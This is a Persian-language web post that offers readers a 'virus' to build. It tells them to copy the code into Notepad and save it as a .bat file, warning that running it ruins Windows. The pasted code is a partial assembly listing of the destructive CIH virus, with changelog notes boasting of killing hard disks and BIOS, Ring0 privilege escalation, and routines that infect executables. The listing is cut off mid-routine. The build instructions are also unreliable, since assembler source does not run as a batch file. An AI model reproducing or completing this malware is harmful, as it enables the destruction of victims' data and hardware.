این رو روی کامپیوتر خودتون ازمایش نکنید چون ویندوز رو داغون میکنه
بریم سر اصل مطلب یعنی ساختش
اول کدهای این ویروس را در پایین در notepad کپی کنید بعد از کپی کردن اون رو با پسوندgood gory .bat سیو (save)کنید ولی مواظب باشید اون رو بر روی کامپیوتر خود باز نکنید.
طرز ساخت در ادمه مطلب!
**************************************************************************** ; * The Virus Program Information * ; **************************************************************************** ; * * ; * Designer : CIH Source : TTIT of TATUNG in Taiwan * ; * Create Date : 04/26/1998 Now Version : 1.4 * ; * Modification Time : 05/31/1998 * ; * * ; * Turbo Assembler Version 4.0 : tasm /m cih * ; * Turbo Link Version 3.01 : tlink /3 /t cih, cih.exe * ; * * ; *==========================================================================* ; * Modification History * ; *==========================================================================* ; * v1.0 1. Create the Virus Program. * ; * 2. The Virus Modifies IDT to Get Ring0 Privilege. * ; * 04/26/1998 3. Virus Code doesn"t Reload into System. * ; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. * ; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. * ; * 6. When System Opens Existing PE File, the File will be * ; * Infected, and the File doesn"t be Reinfected. * ; * 7. It is also Infected, even the File is Read-Only. * ; * 8. When the File is Infected, the Modification Date and Time * ; * of the File also don"t be Changed. * ; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call * ; * Previous FileSystemApiHook, it will Call the Function * ; * that the IFS Manager Would Normally Call to Implement * ; * this Particular I/O Request. * ; * 10. The Virus Size is only 656 Bytes. * ; *==========================================================================* ; * v1.1 1. Especially, the File that be Infected will not Increase * ; * it"s Size... ^__^ * ; * 05/15/1998 2. Hook and Modify Structured Exception Handing. * ; * When Exception Error Occurs, Our OS System should be in * ; * Windows NT. So My Cute Virus will not Continue to Run, * ; * it will Jmup to Original Application to Run. * ; * 3. Use Better Algorithm, Reduce Virus Code Size. * ; * 4. The Virus "Basic" Size is only 796 Bytes. * ; *==========================================================================* ; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... * ; * 2. Modify the Bug of v1.1 * ; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. * ; *==========================================================================* ; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Error. * ; * So When Open WinZip Self-Extractor ==> Don"t Infect it. * ; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes. * ; *==========================================================================* ; * v1.4 1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. * ; * 2. Change the Date of Killing Computers. * ; * 05/31/1998 3. Modify Virus Version Copyright. * ; * 4. The Virus "Basic" Size is 1019 Bytes. * ; ****************************************************************************
.586P
; **************************************************************************** ; * Original PE Executable File(Don"t Modify this Section) * ; ****************************************************************************
OriginalAppEXE SEGMENT
FileHeader: db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h dd 00000000h, VirusSize
OriginalAppEXE ENDS
; **************************************************************************** ; * My Virus Game * ; ****************************************************************************
; ********************************************************* ; * Constant Define * ; *********************************************************
TRUE = 1 FALSE = 0
DEBUG = TRUE
MajorVirusVersion = 1 MinorVirusVersion = 4
VirusVersion = MajorVirusVersion*10h+MinorVirusVersion
IF DEBUG
FirstKillHardDiskNumber = 81h HookExceptionNumber = 05h
ELSE
FirstKillHardDiskNumber = 80h HookExceptionNumber = 03h
ENDIF
FileNameBufferSize = 7fh
; ********************************************************* ; *********************************************************
VirusGame SEGMENT
ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame
; ********************************************************* ; * Ring3 Virus Game Initial Program * ; *********************************************************
MyVirusStart: push ebp
; ************************************* ; * Let"s Modify Structured Exception * ; * Handing, Prevent Exception Error * ; * Occurrence, Especially in NT. * ; *************************************
lea eax, [esp-04h*2]
xor ebx, ebx xchg eax, fs:[ebx]
call @0 @0: pop ebx
lea ecx, StopToRunVirusCode-@0[ebx] push ecx
push eax
; ************************************* ; * Let"s Modify * ; * IDT(Interrupt Deor Table) * ; * to Get Ring0 Privilege... * ; *************************************
push eax ; sidt [esp-02h] ; Get IDT Base Address pop ebx ;
add ebx, HookExceptionNumber*08h+04h ; ZF = 0
cli
mov ebp, [ebx] ; Get Exception Base mov bp, [ebx-04h] ; Entry Point
lea esi, MyExceptionHook-@1[ecx]
push esi
mov [ebx-04h], si ; shr esi, 16 ; Modify Exception mov [ebx+02h], si ; Entry Point Address
pop esi
; ************************************* ; * Generate Exception to Get Ring0 * ; *************************************
int HookExceptionNumber ; GenerateException ReturnAddressOfEndException = $
; ************************************* ; * Merge All Virus Code Section * ; *************************************
push esi mov esi, eax
LoopOfMergeAllVirusCodeSection:
mov ecx, [eax-04h]
rep movsb
sub eax, 08h
mov esi, [eax]
or esi, esi jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1
jmp LoopOfMergeAllVirusCodeSection
QuitLoopOfMergeAllVirusCodeSection:
pop esi
; ************************************* ; * Generate Exception Again * ; *************************************
int HookExceptionNumber ; GenerateException Again
; ************************************* ; * Let"s Restore * ; * Structured Exception Handing * ; *************************************
ReadyRestoreSE: sti
xor ebx, ebx
jmp RestoreSE
; ************************************* ; * When Exception Error Occurs, * ; * Our OS System should be in NT. * ; * So My Cute Virus will not * ; * Continue to Run, it Jmups to * ; * Original Application to Run. * ; *************************************
StopToRunVirusCode: @1 = StopToRunVirusCode
xor ebx, ebx mov eax, fs:[ebx] mov esp, [eax]
RestoreSE: pop dword ptr fs:[ebx] pop eax
; ************************************* ; * Return Original App to Execute * ; *************************************
pop ebp
push 00401000h ; Push Original OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack
ret ; Return to Original App Entry Point
; ********************************************************* ; * Ring0 Virus Game Initial Program * ; *********************************************************
MyExceptionHook: @2 = MyExceptionHook
jz InstallMyFileSystemApiHook
; ************************************* ; * Do My Virus Exist in System !? * ; *************************************
mov ecx, dr0 jecxz AllocateSystemMemoryPage
add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException
; ************************************* ; * Return to Ring3 Initial Program * ; *************************************
ExitRing0Init: mov [ebx-04h], bp ; shr ebp, 16 ; Restore Exception mov [ebx+02h], bp ;
iretd
; ************************************* ; * Allocate SystemMemory Page to Use * ; *************************************
AllocateSystemMemoryPage:
mov dr0, ebx ; Set the Mark of My Virus Exist in System
push 00000000fh ; push ecx ; push 0ffffffffh ; push ecx ; push ecx ; push ecx ; push 000000001h ; push 000000002h ; int 20h ; VMMCALL _PageAllocate _PageAllocate = $ ; dd 00010053h ; Use EAX, ECX, EDX, and flags add esp, 08h*04h
xchg edi, eax ; EDI = SystemMemory Start Address
lea eax, MyVirusStart-@2[esi]
iretd ; Return to Ring3 Initial Program
; ************************************* ; * Install My File System Api Hook * ; *************************************
InstallMyFileSystemApiHook:
lea eax, FileSystemApiHook-@6[edi]
push eax ; int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook IFSMgr_InstallFileSystemApiHook = $ ; dd 00400067h ; Use EAX, ECX, EDX, and flags
mov dr0, eax ; Save OldFileSystemApiHook Address
pop eax ; EAX = FileSystemApiHook Address
; Save Old IFSMgr_InstallFileSystemApiHook Entry Point mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi] mov edx, [ecx] mov OldInstallFileSystemApiHook-@3[eax], edx
; Modify IFSMgr_InstallFileSystemApiHook Entry Point lea eax, InstallFileSystemApiHook-@3[eax] mov [ecx], eax
cli
jmp ExitRing0Init
; ********************************************************* ; * Code Size of Merge Virus Code Section * ; *********************************************************
CodeSizeOfMergeVirusCodeSection = offset $
; ********************************************************* ; * IFSMgr_InstallFileSystemApiHook * ; *********************************************************
InstallFileSystemApiHook: push ebx
call @4 ; @4: ; pop ebx ; mov ebx, offset FileSystemApiHook add ebx, FileSystemApiHook-@4 ;
push ebx int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook IFSMgr_RemoveFileSystemApiHook = $ dd 00400068h ; Use EAX, ECX, EDX, and flags pop eax
; Call Original IFSMgr_InstallFileSystemApiHook ; to Link Client FileSystemApiHook push dword ptr [esp+8] call OldInstallFileSystemApiHook-@3[ebx] pop ecx
push eax
; Call Original IFSMgr_InstallFileSystemApiHook ; to Link My FileSystemApiHook push ebx call OldInstallFileSystemApiHook-@3[ebx] pop ecx
mov dr0, eax ; Adjust OldFileSystemApiHook Address
pop eax
pop ebx
ret
; ********************************************************* ; * Static Data * ; *********************************************************
OldInstallFileSystemApiHook dd ?
; ********************************************************* ; * IFSMgr_FileSystemHook * ; *********************************************************
; ************************************* ; * IFSMgr_FileSystemHook Entry Point * ; *************************************
FileSystemApiHook: @3 = FileSystemApiHook
pushad
call @5 ; @5: ; pop esi ; mov esi, offset VirusGameDataStartAddress add esi, VirusGameDataStartAddress-@5
; ************************************* ; * Is OnBusy !? * ; *************************************
test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy ) jnz pIFSFunc ; goto pIFSFunc
; ************************************* ; * Is OpenFile !? * ; *************************************
; if ( NotOpenFile ) ; goto prevhook lea ebx, [esp+20h+04h+04h] cmp dword ptr [ebx], 00000024h jne prevhook
; ************************************* ; * Enable OnBusy * ; *************************************
inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy
; ************************************* ; * Get FilePath"s DriveNumber, * ; * then Set the DriveName to * ; * FileNameBuffer. * ; ************************************* ; * Ex. If DriveNumber is 03h, * ; * DriveName is "C:". * ; *************************************
; mov esi, offset FileNameBuffer add esi, FileNameBuffer-@6
push esi
mov al, [ebx+04h] cmp al, 0ffh je CallUniToBCSPath
add al, 40h mov ah, ":"
mov [esi], eax
inc esi inc esi
; ************************************* ; * UniToBCSPath * ; ************************************* ; * This Service Converts * ; * a Canonicalized Unicode Pathname * ; * to a Normal Pathname in the * ; * Specified BCS Character Set. * ; *************************************
CallUniToBCSPath: push 00000000h push FileNameBufferSize mov ebx, [ebx+10h] mov eax, [ebx+0ch] add eax, 04h push eax push esi int 20h ; VXDCall UniToBCSPath UniToBCSPath = $ dd 00400041h add esp, 04h*04h
; ************************************* ; * Is FileName ".EXE" !? * ; *************************************
; cmp [esi+eax-04h], ".EXE" cmp [esi+eax-04h], "EXE." pop esi jne DisableOnBusy
IF DEBUG
; ************************************* ; * Only for Debug * ; *************************************
; cmp [esi+eax-06h], "FUCK" cmp [esi+eax-06h], "KCUF" jne DisableOnBusy
ENDIF
; ************************************* ; * Is Open Existing File !? * ; *************************************
; if ( NotOpenExistingFile ) ; goto DisableOnBusy cmp word ptr [ebx+18h], 01h jne DisableOnBusy
; ************************************* ; * Get Attributes of the File * ; *************************************
mov ax, 4300h int 20h ; VXDCall IFSMgr_Ring0_FileIO IFSMgr_Ring0_FileIO = $ dd 00400032h
jc DisableOnBusy
push ecx
; ************************************* ; * Get IFSMgr_Ring0_FileIO Address * ; *************************************
mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi] mov edi, [edi]
; ************************************* ; * Is Read-Only File !? * ; *************************************
test cl, 01h jz OpenFile
; ************************************* ; * Modify Read-Only File to Write * ; *************************************
mov ax, 4301h xor ecx, ecx call edi ; VXDCall IFSMgr_Ring0_FileIO
; ************************************* ; * Open File * ; *************************************
OpenFile: xor eax, eax mov ah, 0d5h xor ecx, ecx xor edx, edx inc edx mov ebx, edx inc ebx call edi ; VXDCall IFSMgr_Ring0_FileIO
xchg ebx, eax ; mov ebx, FileHandle
; ************************************* ; * Need to Restore * ; * Attributes of the File !? * ; *************************************
pop ecx
pushf
test cl, 01h jz IsOpenFileOK
; ************************************* ; * Restore Attributes of the File * ; *************************************
mov ax, 4301h call edi ; VXDCall IFSMgr_Ring0_FileIO
; ************************************* ; * Is Open File OK !? * ; *************************************
IsOpenFileOK: popf
jc DisableOnBusy
; ************************************* ; * Open File Already Succeed. ^__^ * ; *************************************
push esi ; Push FileNameBuffer Address to Stack
pushf ; Now CF = 0, Push Flag to Stack
add esi, DataBuffer-@7 ; mov esi, offset DataBuffer
; *************************** ; * Get OffsetToNewHeader * ; ***************************
xor eax, eax mov ah, 0d6h
; For Doing Minimal VirusCode"s Length, ; I Save EAX to EBP. mov ebp, eax
push 00000004h pop ecx push 0000003ch pop edx call edi ; VXDCall IFSMgr_Ring0_FileIO
mov edx, [esi]
; *************************** ; * Get "PE
فخرالدین خرمالی
|